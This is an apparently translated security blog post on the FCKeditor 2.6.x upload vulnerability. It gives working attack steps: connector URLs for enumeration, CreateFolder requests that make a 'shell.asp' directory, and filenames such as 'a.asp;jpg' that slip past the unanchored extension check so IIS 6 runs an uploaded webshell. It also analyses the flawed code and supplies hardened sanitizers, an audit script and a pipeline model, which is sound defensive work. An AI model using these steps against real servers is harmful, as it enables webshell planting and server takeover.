FCKeditor PHP/ASP File Upload Vulnerability


    Contents

    1. Vulnerability description
    2. Trigger conditions
    3. Affected versions
    4. Vulnerable code analysis
    5. Defenses
    6. Offense/defense reflections

    1. Vulnerability description

    FCKeditor is one of the best-known WYSIWYG web editors. It is written in JavaScript, is feature-rich, easy to configure, works across browsers, ships server-side connectors for several languages and is open source. It is very popular, documentation is easy to find on the internet, and many domestic web projects and large sites use it.
    It integrates with PHP, JavaScript, ASP, ASP.NET, ColdFusion, Java, ABAP and other server-side languages.
    One of FCK's important features, the file-upload connector, is routinely abused by attackers to get a shell. The root causes are lax access control on the connector and extension-restriction logic that can be bypassed.

    Relevant Link:

    http://sebug.net/vuldb/ssvid-20830


    2. Trigger conditions

    0x1: Information gathering

    First collect the FCK version (the about dialog is a static page and reveals it):

    http://localhost/fckeditor/editor/dialog/fck_about.html
    /*
    version 
    2.6.8
    Build 25427
    */

    0x2: Finding the upload endpoint

    Physical path disclosure
    http://172.31.200.74/editor/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
    
    1. Path disclosure
    http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
    
    2. Directory listing through the connector also helps locate the upload directory
    http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
    
    http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
    
    3. Other upload pages
    http://192.168.174.138/fckeditor/_samples/default.html
    http://192.168.174.138/fckeditor/_samples/asp/sample01.asp
    http://192.168.174.138/fckeditor/_samples/asp/sample02.asp
    http://192.168.174.138/fckeditor/_samples/asp/sample03.asp
    http://192.168.174.138/fckeditor/_samples/asp/sample04.asp
    Many sites have already deleted the _samples directory, but it is worth trying.
    FCKeditor/editor/fckeditor.html cannot upload on its own; clicking the insert-image button and then "Browse Server" opens the file browser, which does have an upload form.
    http://192.168.174.138/fckeditor/editor/fckeditor.html
    
    4. Commonly used upload addresses
    http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
    http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
    http://192.168.174.138/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php  
    
    5. Upload addresses of the test pages shipped with FCKeditor
    http://192.168.174.138/fckeditor/editor/filemanager/browser/default/connectors/test.html
    http://192.168.174.138/fckeditor/editor/filemanager/upload/test.html
    http://192.168.174.138/fckeditor/editor/filemanager/connectors/test.html
    http://192.168.174.138/fckeditor/editor/filemanager/connectors/uploadtest.html 

    The upload endpoints finally obtained are:

    http://localhost/fckeditor/editor/filemanager/connectors/test.html
    http://localhost/fckeditor/editor/filemanager/connectors/uploadtest.html

    0x3: Creating a new folder

    http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
    //creates the folder z under /shell.asp in the Image resource directory (userfiles/image); the uuid parameter is only a cache-buster

    0x4: IIS parsing vulnerability

    If a file sits in a directory whose name ends in .asp, IIS 6 hands every file in that directory to asp.dll regardless of the file's own extension. This is the IIS 6 "xx.asp directory" parsing flaw.

    1. Create the directory shell.asp (with a sub-directory z inside it)
    http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
    http://localhost/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
    Note that the first URL passes the dotted name in CurrentFolder rather than NewFolderName: only NewFolderName goes through SanitizeFolderName (see section 5, 0x3), while CurrentFolder is only checked for path traversal and any missing directory on it is created on disk.

    2. Upload an xx.jpg whose content is a webshell into that directory
    http://localhost/userfiles/image/shell.asp/z/choop.jpg
    //IIS 6 parses this xx.jpg as an ASP script, so the webshell runs

    0x5: FCK's extension filter versus the IIS parsing flaw

    Normally FCK does have defensive logic for the extension of an uploaded file (script extensions are not on the allow-list), and ForceSingleExtension rewrites names that carry more than one extension:

    1. Upload file name: shell.php;.jpg
    Every dot except the last is replaced with "_", so the file is stored as shell_php;.jpg. IIS 6 cuts the name at ";" and sees shell_php, which has no script extension, so this name is harmless.

    2. If the upload file name is:
        1) a.php;a_jpg
        2) a.asp;a_jpg
    the name contains only one dot, so nothing is renamed. The part after the last dot is php;a_jpg (or asp;a_jpg), and the allow-list test is an unanchored RegExp.Test against bmp|gif|jpeg|jpg|png, which succeeds because that string contains jpg.

    3. Because IIS 6 truncates the file name at ";", the stored file is, as far as IIS is concerned,
    a.php
    a.asp
    and is executed as a script.

    Relevant Link:

    http://hi.baidu.com/holyli/item/f2d37959513ed509e6c4a597


    3. Affected versions

    2.6.x (the analysis below is against 2.6.8, the version reported by fck_about.html above)


    4. Vulnerable code analysis

    FCKeditor's upload check uses a deny-list/allow-list of extensions per resource type. The implementation lives in

    1. asp: editor/filemanager/connectors/asp/io.asp
    2. php: editor/filemanager/connectors/php/io.php
    //the browser directory contains a second copy of the same connector tree
    3. asp: editor/filemanager/browser/default/connectors/asp/io.asp
    4. php: editor/filemanager/browser/default/connectors/php/io.php

    0x1: ASP

    fckeditor/editor/filemanager/connectors/asp/class_upload.asp

    Private Function IsAllowed(sExt)
            Dim oRE
            Set oRE    = New RegExp
            oRE.IgnoreCase    = True
            oRE.Global        = True
    
            If sDenied = "" Then
                oRE.Pattern    = sAllowed
                IsAllowed    = (sAllowed = "") Or oRE.Test(sExt)
            Else
                oRE.Pattern    = sDenied
                IsAllowed    = Not oRE.Test(sExt)
            End If
    
            Set oRE    = Nothing
    End Function

    fckeditor/editor/filemanager/connectors/asp/io.asp

    Function IsAllowedExt( extension, resourceType )
        Dim oRE
        Set oRE    = New RegExp
        oRE.IgnoreCase    = True
        oRE.Global        = True
    
        Dim sAllowed, sDenied
        sAllowed    = ConfigAllowedExtensions.Item( resourceType )
        sDenied        = ConfigDeniedExtensions.Item( resourceType )
    
        IsAllowedExt = True
    
        If sDenied <> "" Then
            oRE.Pattern    = sDenied
            IsAllowedExt    = Not oRE.Test( extension )
        End If
    
        If IsAllowedExt And sAllowed <> "" Then
            oRE.Pattern        = sAllowed
            IsAllowedExt    = oRE.Test( extension )
        End If
    
        Set oRE    = Nothing
    End Function

    The allow/deny lists that the uploaded file's extension is tested against come from FCK's configuration file config.asp:
    fckeditor/editor/filemanager/connectors/asp/config.asp

    ConfigAllowedExtensions.Add    "File", "7z|aiff|asf|avi|bmp|csv|doc|fla|flv|gif|gz|gzip|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|ods|odt|pdf|png|ppt|pxd|qt|ram|rar|rm|rmi|rmvb|rtf|sdc|sitd|swf|sxc|sxw|tar|tgz|tif|tiff|txt|vsd|wav|wma|wmv|xls|xml|zip"
    
    ConfigAllowedExtensions.Add    "Image", "bmp|gif|jpeg|jpg|png"
    
    ConfigAllowedExtensions.Add    "Flash", "swf|flv"
    
    ConfigAllowedExtensions.Add    "Media", "aiff|asf|avi|bmp|fla|flv|gif|jpeg|jpg|mid|mov|mp3|mp4|mpc|mpeg|mpg|png|qt|ram|rm|rmi|rmvb|swf|tif|tiff|wav|wma|wmv"

    Note that these lists are used as bare regular expressions without ^ and $, so IsAllowedExt is a substring test. The lists only feed that test; the renaming of the file happens here:
    fckeditor/editor/filemanager/connectors/asp/io.asp

    ' Do a cleanup of the file name to avoid possible problems
    function SanitizeFileName( sNewFileName )
        Dim oRegex
        Set oRegex = New RegExp
        oRegex.Global        = True

        if ( ConfigForceSingleExtension = True ) then
            ' This is the renaming logic. The pattern matches every "." that still has
            ' another "." somewhere after it: the negative lookahead (?![^.]*$) fails only
            ' for the last dot. Each such dot is replaced with "_", so only the last
            ' extension survives.
            ' 1. A name like asp.asp;asp.jpg is caught: the first dot becomes "_" and the
            '    file is stored as asp_asp;asp.jpg. IIS 6 truncates at ";" and sees
            '    asp_asp, which has no script extension.
            ' 2. A name like asp.asp;jpg has only one dot, so nothing is replaced. Its
            '    "extension" is asp;jpg, which the unanchored IsAllowedExt test above
            '    accepts because it contains jpg, and IIS 6 executes it as asp.asp.
            '    That is the bypass.
            oRegex.Pattern = "\.(?![^.]*$)"
            sNewFileName = oRegex.Replace( sNewFileName, "_" )
        end if

    ' remove \ / | : ? *  " < > and control characters (";" is not in the list)
        oRegex.Pattern = "(\\|\/|\||:|\?|\*|""|<|>|[\u0000-\u001F]|\u007F)"
        SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

        Set oRegex = Nothing
    end function


    5. Defenses

    1. ASP

    0x1: Delete the test HTML pages under fckeditor

    1. editor/filemanager/connectors/test.html
    (likewise uploadtest.html, the test.html copies under browser/default/connectors and upload, and the _samples directory listed in section 2)
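    The following is an added Python audit helper, not part of the original post or of FCKeditor, that checks an on-disk install for the sample/test pages enumerated in section 2 and reads the two connector flags that matter here: the connector's enable switch (ConfigIsEnabled in config.asp, $Config['Enabled'] in config.php) and ConfigForceSingleExtension / $Config['ForceSingleExtension']. The file names and flag syntax are those of FCKeditor 2.6.x as assumed here; the function names are the example's own, and the install tree it scans is constructed inline with tempfile so the script runs offline.

```python
import os
import re
import tempfile

# Sample/test pages from section 2 (0x2). None of them should exist on a production install.
LEFTOVER_PAGES = [
    "_samples",
    "editor/filemanager/browser/default/connectors/test.html",
    "editor/filemanager/upload/test.html",
    "editor/filemanager/connectors/test.html",
    "editor/filemanager/connectors/uploadtest.html",
]

# Connector configs and the flags to read from them.
# Assumed 2.6.x syntax: VBScript "ConfigIsEnabled = False" and PHP "$Config['Enabled'] = false ;".
CONFIG_FILES = {
    "editor/filemanager/connectors/asp/config.asp": {
        "enabled": re.compile(r"^\s*ConfigIsEnabled\s*=\s*(True|False)", re.I | re.M),
        "single_ext": re.compile(r"^\s*ConfigForceSingleExtension\s*=\s*(True|False)", re.I | re.M),
    },
    "editor/filemanager/connectors/php/config.php": {
        "enabled": re.compile(r"\$Config\['Enabled'\]\s*=\s*(true|false)", re.I),
        "single_ext": re.compile(r"\$Config\['ForceSingleExtension'\]\s*=\s*(true|false)", re.I),
    },
}


def audit(root):
    """Scan an FCKeditor install root.

    Returns {"leftovers": [relative paths that still exist],
             "connectors": {config path: {"enabled": bool|None, "single_ext": bool|None}}}
    where None means the flag line was not found in that config file."""
    leftovers = [rel for rel in LEFTOVER_PAGES if os.path.exists(os.path.join(root, rel))]
    connectors = {}
    for rel, flags in CONFIG_FILES.items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        connectors[rel] = {}
        for flag, pattern in flags.items():
            match = pattern.search(text)
            connectors[rel][flag] = (match.group(1).lower() == "true") if match else None
    return {"leftovers": leftovers, "connectors": connectors}


def findings(report):
    """Turn an audit report into the list of things to fix."""
    out = [f"delete leftover page: {rel}" for rel in report["leftovers"]]
    for rel, flags in report["connectors"].items():
        if flags.get("enabled"):
            out.append(f"{rel}: connector is enabled; keep it off unless this site really uploads through FCK")
        if flags.get("single_ext") is False:
            out.append(f"{rel}: ForceSingleExtension is off; names like shell.php;.jpg keep their first extension")
    return out


def build_sample_install():
    """Constructed 2.6.x-style tree with the sample pages still present (test fixture, not a real install)."""
    root = tempfile.mkdtemp(prefix="fck_")
    files = {
        "_samples/default.html": "<html></html>\n",
        "editor/filemanager/connectors/test.html": "<html></html>\n",
        "editor/filemanager/connectors/uploadtest.html": "<html></html>\n",
        "editor/filemanager/connectors/asp/config.asp":
            "ConfigIsEnabled = True\nConfigForceSingleExtension = False\n",
        "editor/filemanager/connectors/php/config.php":
            "<?php\n$Config['Enabled'] = false ;\n$Config['ForceSingleExtension'] = true ;\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for line in findings(audit(build_sample_install())):
        print(line)
```

    Point audit() at the web root of a real install instead of build_sample_install() to get the same report; a flag reported as None means the config file has been customised enough that the line should be checked by hand.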

    0x2: Defend against the IIS semicolon truncation at code level

    editor/filemanager/connectors/asp/io.asp

    As originally published, this patch assigned each intermediate result to SanitizeFileName instead of feeding it into the next step, so the first two replacements were silently discarded. The version below chains the three steps, and runs the script-extension strip whether or not ForceSingleExtension is on, as the PHP version further down does.

    ' Do a cleanup of the file name to avoid possible problems
    function SanitizeFileName( sNewFileName )
        Dim oRegex
        Dim oRegexSecurityExt
        Set oRegex                 = New RegExp
        Set oRegexSecurityExt     = New RegExp
        oRegex.Global                    = True
        oRegexSecurityExt.Global        = True
        oRegexSecurityExt.IgnoreCase    = True

        if ( ConfigForceSingleExtension = True ) then
            oRegex.Pattern = "\.(?![^.]*$)"
            sNewFileName = oRegex.Replace( sNewFileName, "_" )
        end if

        ' neutralise a script extension that ends the name or is followed by ";"
        oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)"
        sNewFileName = oRegexSecurityExt.Replace( sNewFileName, "_" )

    ' remove \ / | : ; ? *  " < > and control characters (";" is the addition)
        oRegex.Pattern = "(\\|\/|\||:|;|\?|\*|""|<|>|[\u0000-\u001F]|\u007F)"
        SanitizeFileName = oRegex.Replace( sNewFileName, "_" )

        Set oRegex = Nothing
        Set oRegexSecurityExt = Nothing
    end function

    0x3: Defend against the IIS directory parsing flaw (xx.asp directories) at code level
    If an attacker uses FCK's CreateFolder command to create a directory named xx.asp, IIS 6 treats every file inside it as an ASP script, so a jpg containing a webshell uploaded into that directory is executed. The same chaining fix as in 0x2 applies here.

    ' Do a cleanup of the folder name to avoid possible problems
    function SanitizeFolderName( sNewFolderName )
        Dim oRegex
        Dim oRegexSecurityExt
        Set oRegex                 = New RegExp
        Set oRegexSecurityExt     = New RegExp
        oRegex.Global                    = True
        oRegexSecurityExt.Global        = True
        oRegexSecurityExt.IgnoreCase    = True

        'remove . \ / | : ? ; *  " < > and control characters
        oRegex.Pattern = "(\.|\\|\/|\||:|\?|;|\*|""|<|>|[\u0000-\u001F]|\u007F)"
        sNewFolderName = oRegex.Replace( sNewFolderName, "_" )

        'forbid the dangerous extensions
        oRegexSecurityExt.Pattern = "\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$"
        SanitizeFolderName = oRegexSecurityExt.Replace( sNewFolderName, "_" )

        Set oRegex = Nothing
        Set oRegexSecurityExt = Nothing
    end function

    Two caveats. First, the character pattern already turns every "." into "_", so the extension pattern after it can never match; it is harmless but redundant. Second, both patterns only touch NewFolderName. The CreateFolder URL in section 2 puts shell.asp into CurrentFolder instead, and the connector creates any missing directory on that path before creating the new one, so CurrentFolder needs the same treatment (reject any path segment that ends in a script extension) or the xx.asp directory can still be created.

    0x4: Regex bypass of the extension allow-list

    The fix is the same as in 0x2 (semicolon truncation), and in addition the patterns should be anchored with "^" and "$" delimiters so that a malformed extension such as php;a_jpg cannot satisfy the allow-list merely by containing jpg. The connector already does this for the resource-type and command checks; IsAllowedExt should test "^(" & sAllowed & ")$" in the same way:

    Function IsAllowedType( resourceType )
        Dim oRE
        Set oRE    = New RegExp
        oRE.IgnoreCase    = False
        oRE.Global        = True
        oRE.Pattern        = "^(" & ConfigAllowedTypes & ")$"
    
        IsAllowedType = oRE.Test( resourceType )
    
        Set oRE    = Nothing
    End Function
    
    Function IsAllowedCommand( sCommand )
        Dim oRE
        Set oRE    = New RegExp
        oRE.IgnoreCase    = True
        oRE.Global        = True
        oRE.Pattern        = "^(" & ConfigAllowedCommands & ")$"
    
        IsAllowedCommand = oRE.Test( sCommand )
    
        Set oRE    = Nothing
    End Function
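    To make the interplay between the sanitizer, the allow-list test and IIS 6 concrete, here is an added Python model of the whole pipeline. It is not FCKeditor code (FCKeditor's connectors are ASP/PHP); Python is used only because the point is the regular expressions and what IIS 6 makes of the stored name. The sanitizers and the Image allow-list are transcribed from sections 4 and 5; the IIS 6 behaviour modelled is the ";" truncation and the execution of everything under a directory named *.asp (here also .asa/.cer/.cdx, assumed to be the default asp.dll script map) from section 2. The function names, and the assumption that the connector takes the extension from the name after sanitizing it, are the example's own. It runs the page's own cases (shell.php;.jpg, a.php;a_jpg, a.asp;jpg, shell.asp, and a jpg inside shell.asp/z) through the shipped logic and through the hardened logic from 0x2 and 0x4.

```python
import re

# ConfigAllowedExtensions "Image" from config.asp (section 4)
IMAGE_ALLOWED = "bmp|gif|jpeg|jpg|png"
# the script-extension list used by the hardened code in section 5
DANGEROUS = "asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm"
# directory-name extensions IIS 6 hands to asp.dll (assumed default script map)
ASP_DLL_EXTS = ("asp", "asa", "cer", "cdx")


def sanitize_filename_v26(name, force_single_extension=True):
    """SanitizeFileName as shipped in 2.6.x (section 4)."""
    if force_single_extension:
        # every "." that still has another "." after it becomes "_"; only the last dot survives
        name = re.sub(r"\.(?![^.]*$)", "_", name)
    # \ / | : ? * " < > and control characters -> "_".  ";" is NOT in this list.
    return re.sub(r'[\\/|:?*"<>\x00-\x1f\x7f]', "_", name)


def sanitize_filename_hardened(name, force_single_extension=True):
    """The section 5 (0x2) version, with the three steps chained."""
    if force_single_extension:
        name = re.sub(r"\.(?![^.]*$)", "_", name)
    # ".php;" / ".asp" at the end of the name is neutralised before IIS can see it
    name = re.sub(rf"\.({DANGEROUS})(;|$)", "_", name, flags=re.I)
    # same character list as before, plus ";"
    return re.sub(r'[\\/|:;?*"<>\x00-\x1f\x7f]', "_", name)


def extension_of(name):
    """The connector takes everything after the LAST "." as the extension ("" if there is none)."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def is_allowed_ext_unanchored(ext, allowed=IMAGE_ALLOWED):
    """IsAllowedExt as shipped: RegExp.Test with a bare "a|b|c" pattern is a substring search."""
    return re.search(allowed, ext, re.I) is not None


def is_allowed_ext_anchored(ext, allowed=IMAGE_ALLOWED):
    """The same test with ^( )$ delimiters, as section 5 (0x4) recommends."""
    return re.fullmatch(f"({allowed})", ext, re.I) is not None


def iis6_script_type(url_path):
    """Which script engine IIS 6 would run a stored file with: "asp", "php", ... or "" for static.

    Models the two IIS 6 parsing quirks the page relies on: the request name is cut at the
    first ";", and every file below a directory named like "x.asp" is handed to asp.dll."""
    segments = url_path.split("/")
    for directory in segments[:-1]:
        if extension_of(directory) in ASP_DLL_EXTS:
            return "asp"
    return extension_of(segments[-1].split(";", 1)[0])


def upload(name, folder, sanitize, allowed_check):
    """One FileUpload request: sanitize, test the extension, then ask what IIS 6 makes of the
    stored path. Returns the engine name, or None when the connector rejects the file."""
    stored = sanitize(name)
    if not allowed_check(extension_of(stored)):
        return None
    return iis6_script_type(f"{folder}/{stored}")


def demo():
    """The page's test names through the shipped and the hardened pipeline: {name: (shipped, hardened)}."""
    def shipped(name, folder="/userfiles/image"):
        return upload(name, folder, sanitize_filename_v26, is_allowed_ext_unanchored)

    def hardened(name, folder="/userfiles/image"):
        return upload(name, folder, sanitize_filename_hardened, is_allowed_ext_anchored)

    cases = {n: (shipped(n), hardened(n))
             for n in ("shell.php;.jpg", "a.php;a_jpg", "a.asp;jpg", "shell.asp")}
    # 0x4 in section 2: a genuine jpg inside a directory called shell.asp
    cases["shell.asp/z/choop.jpg"] = (shipped("choop.jpg", "/userfiles/image/shell.asp/z"),
                                      hardened("choop.jpg", "/userfiles/image/shell.asp/z"))
    return cases


if __name__ == "__main__":
    for name, (before, after) in demo().items():
        print(f"{name:24} shipped={before!r:8} hardened={after!r}")
```

    demo() shows the two names the text calls out, a.php;a_jpg and a.asp;jpg, being accepted by the shipped code and handed to the php/asp engine, and being rejected once the script-extension strip and the anchored allow-list are in place; shell.php;.jpg is harmless in both because ForceSingleExtension turns it into shell_php;.jpg and IIS 6 then sees shell_php. The last case is the one no file-name fix can touch: choop.jpg under shell.asp/z still comes back as asp, which is why 0x3 (folder names, and CurrentFolder in particular) is a separate control.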

    Relevant Link:

    http://www.chinaz.com/news/2012/1205/284700.shtml
    http://www.sdlunzhong.cn/itres/showitnews.aspx?id=807

    2. PHP

    When PHP runs under IIS via FastCGI, the ASP and PHP environments coexist on the same server and the same IIS parsing flaws apply, so the PHP connector needs the same hardening.

    /editor/filemanager/connectors/php/io.php

    // Do a cleanup of the folder name to avoid possible problems
    function SanitizeFolderName( $sNewFolderName )
    {
        $sNewFolderName = stripslashes( $sNewFolderName ) ;

        // Remove . \ / | : ; ? * " < > and control characters
        // (inside a single-quoted PHP string a regex backslash has to be written as \\\\;
        //  a bare \\ becomes "\|" and escapes the alternation instead of matching "\")
        $sNewFolderName = preg_replace( '/\.|\\\\|\/|\||:|;|\?|\*|"|<|>|[[:cntrl:]]/', '_', $sNewFolderName ) ;

        // belt and braces: a script extension at the end of the name (cannot match once dots are gone)
        $sNewFolderName = preg_replace( '/\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)$/i', '_', $sNewFolderName ) ;

        return $sNewFolderName ;
    }

    // Do a cleanup of the file name to avoid possible problems
    function SanitizeFileName( $sNewFileName )
    {
        global $Config ;

        $sNewFileName = stripslashes( $sNewFileName ) ;

        // Replace dots in the name with underscores (only one dot can be there... security issue).
        if ( $Config['ForceSingleExtension'] )
            $sNewFileName = preg_replace( '/\.(?![^.]*$)/', '_', $sNewFileName ) ;

        // Neutralise a script extension that ends the name or is followed by ";".
        // This runs before ";" is stripped below, otherwise the (;|$) alternative can never match.
        $sNewFileName = preg_replace( '/\.(asp|aspx|cer|asa|hdx|cdx|php|php5|php4|php3|phtml|shtml|jsp|jspx|xsp|cfm)(;|$)/i', '_', $sNewFileName ) ;

        // Remove \ / | : ; ? * " < > and control characters
        $sNewFileName = preg_replace( '/\\\\|\/|\||:|;|\?|\*|"|<|>|[[:cntrl:]]/', '_', $sNewFileName ) ;

        return $sNewFileName ;
    }


    6. Offense/defense reflections

    Copyright (c) 2014 LittleHann All rights reserved

    Original post: https://www.cnblogs.com/LittleHann/p/4323968.html